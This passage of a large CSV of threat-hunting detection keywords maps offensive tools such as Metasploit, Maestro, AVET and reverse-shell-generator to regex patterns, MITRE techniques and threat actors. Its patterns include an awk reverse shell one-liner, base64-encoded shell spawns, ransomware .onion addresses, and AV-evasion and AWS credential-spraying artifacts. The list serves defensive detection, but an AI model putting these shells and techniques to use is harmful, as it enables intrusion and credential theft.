networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34335" "*av_hips_executables.txt*",".{0,1000}av_hips_executables\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34336" "*avaddonbotrxmuyl.onion*",".{0,1000}avaddonbotrxmuyl\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34337" "*avaddongun7rngel.onion*",".{0,1000}avaddongun7rngel\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34338" "*Available ProgIDs and CLSIDs for DLL Hijacking:*",".{0,1000}Available\sProgIDs\sand\sCLSIDs\sfor\sDLL\sHijacking\:.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","34339" "*avast_memory_dump.md*",".{0,1000}avast_memory_dump\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34340" "*avet-master.zip*",".{0,1000}avet\-master\.zip.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","34342" "*avflagged.exe*",".{0,1000}avflagged\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","34343" "*avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion*",".{0,1000}avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34344" "*avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion*",".{0,1000}avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34345" "*avrdude -c usbasp -p m328p -U flash:w:avr.hex*",".{0,1000}avrdude\s\-c\susbasp\s\-p\sm328p\s\-U\sflash\:w\:avr\.hex.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","34346" "*avred-main.zip*",".{0,1000}avred\-main\.zip.{0,1000}","offensive_tool_keyword","avred","Avred is used to identify which parts of a file are identified by an antivirus and tries to show as much information and context as possible about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","34347" "*av-update-urls.txt*",".{0,1000}av\-update\-urls\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34348" "*aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp*",".{0,1000}aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","34349" "*aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vc2gnKQ==*",".{0,1000}aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vc2gnKQ\=\=.{0,1000}","offensive_tool_keyword","metasploit","bash reverse shell default base64 from metasploit","T1059 - T1071 - T1573","TA0011 - TA0002","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","C2","https://github.com/rapid7/metasploit-framework","1","0","#base64 #linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34350" "*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*",".{0,1000}aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login 
page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#base64","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","34351" "*Aw8KAw4LDgvZDgLUz2rLC2rPBMC*",".{0,1000}Aw8KAw4LDgvZDgLUz2rLC2rPBMC.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","34352" "*AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph*",".{0,1000}AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","34353" "*await DeleteIntuneCommand.Exe*",".{0,1000}await\sDeleteIntuneCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34354" "*await 
DeleteIntuneScriptCommand.Exe*",".{0,1000}await\sDeleteIntuneScriptCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34355" "*await ExecIntuneAppCommand.Exe*",".{0,1000}await\sExecIntuneAppCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34356" "*await ExecIntuneCommand.Exe*",".{0,1000}await\sExecIntuneCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34357" "*await ExecIntuneDeviceQueryCommand.Exe*",".{0,1000}await\sExecIntuneDeviceQueryCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34358" "*await ExecIntuneScriptCommand.Exe*",".{0,1000}await\sExecIntuneScriptCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34359" "*await ExecIntuneSyncCommand.Exe*",".{0,1000}await\sExecIntuneSyncCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that 
simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34360" "*await GetAccessTokenCommand.Exe*",".{0,1000}await\sGetAccessTokenCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34361" "*await GetEntraCommand.Exe*",".{0,1000}await\sGetEntraCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here 
https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34362" "*await GetEntraGroupsCommand.Exe*",".{0,1000}await\sGetEntraGroupsCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34363" "*await GetEntraUsersCommand.Exe*",".{0,1000}await\sGetEntraUsersCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34364" "*await GetIntuneAppsCommand.Exe*",".{0,1000}await\sGetIntuneAppsCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password 
knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34365" "*await GetIntuneCommand.Exe*",".{0,1000}await\sGetIntuneCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34366" "*await GetIntuneDevicesCommand.Exe*",".{0,1000}await\sGetIntuneDevicesCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34367" "*await 
GetIntuneScriptsCommand.Exe*",".{0,1000}await\sGetIntuneScriptsCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34368" "*await GetPrtCookieCommand.Exe*",".{0,1000}await\sGetPrtCookieCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34369" "*awesome-cve-poc*",".{0,1000}awesome\-cve\-poc.{0,1000}","offensive_tool_keyword","POC","list of poc exploitation for known CVE","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tool","https://github.com/qazbnm456/awesome-cve-poc","1","1","N/A","N/A","N/A","10","3390","725","2022-01-04T19:07:43Z","2017-02-02T06:43:14Z","34372" "*Awesome-Hacking*",".{0,1000}Awesome\-Hacking.{0,1000}","offensive_tool_keyword","Awesome-Hacking","A collection of 
awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","N/A","10","91563","9230","2025-01-18T01:48:02Z","2016-03-30T15:47:10Z","34373" "*Awesome-Hacking-Resources*",".{0,1000}Awesome\-Hacking\-Resources.{0,1000}","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tool","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","N/A","10","15815","2139","2024-03-12T00:19:30Z","2017-10-10T19:09:18Z","34374" "*awesome-osint*",".{0,1000}awesome\-osint.{0,1000}","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. 
publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","N/A","10","21018","3021","2025-04-20T17:31:01Z","2016-11-30T13:26:11Z","34375" "*awesome-pentest*",".{0,1000}awesome\-pentest.{0,1000}","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","N/A","10","22911","4542","2024-12-14T12:02:31Z","2014-08-03T23:13:53Z","34376" "*awesome-pentest-cheat-sheets*",".{0,1000}awesome\-pentest\-cheat\-sheets.{0,1000}","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tool","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","N/A","10","4010","781","2024-02-16T13:38:52Z","2016-11-29T00:00:18Z","34377" "*awesome-scapy*",".{0,1000}awesome\-scapy.{0,1000}","offensive_tool_keyword","awesome-scapy","A Python tool and library for low level packet creation and manipulation","T1571 - T1596 - T1567 - T1569","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/secdev/awesome-scapy","1","1","N/A","N/A","N/A","3","277","42","2024-08-29T09:42:39Z","2020-02-04T12:17:35Z","34378" "*awesome-static-analysis*",".{0,1000}awesome\-static\-analysis.{0,1000}","offensive_tool_keyword","awesome-static-analysis","This is a collection of static analysis tools and code quality checkers","T1064 - T1027 - T1029 - T1518","TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/codefactor-io/awesome-static-analysis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34379" 
"*awesome-web-security*",".{0,1000}awesome\-web\-security.{0,1000}","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Vulnerability Scanner","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","N/A","10","11873","1696","2024-02-22T00:28:07Z","2017-01-29T16:50:21Z","34380" "*awesome-windows-domain-hardening*",".{0,1000}awesome\-windows\-domain\-hardening.{0,1000}","offensive_tool_keyword","awesome-windows-domain-hardening","A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools","T1563 - T1059 - T1547 - T1057 - T1574","TA0002 - TA0008 - TA0003 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/PaulSec/awesome-windows-domain-hardening","1","0","N/A","N/A","N/A","10","1768","267","2020-01-07T19:56:18Z","2017-02-19T19:20:38Z","34381" "*awk 'BEGIN {s = ""/inet/tcp/0/*"";*printf ""shell>"" |& s;*getline*print $0 |& s;*close*}' /dev/null*",".{0,1000}awk\s\'BEGIN\s\{s\s\=\s\""\/inet\/tcp\/0\/.{0,1000}\""\;.{0,1000}printf\s\""shell\>\""\s\|\&\ss\;.{0,1000}getline.{0,1000}print\s\$0\s\|\&\ss\;.{0,1000}close.{0,1000}\}\'\s\/dev\/null.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","34382" "*awk_reverse_tcp.py*",".{0,1000}awk_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","34383" "*AWS Account Bruteforce Ratelimit! Sleeping for *",".{0,1000}AWS\sAccount\sBruteforce\sRatelimit!\sSleeping\sfor\s.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","34384" "*aws configure --profile exegol*",".{0,1000}aws\sconfigure\s\-\-profile\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","34385" "*AWS_BUCKET=nemesis-test*",".{0,1000}AWS_BUCKET\=nemesis\-test.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black 
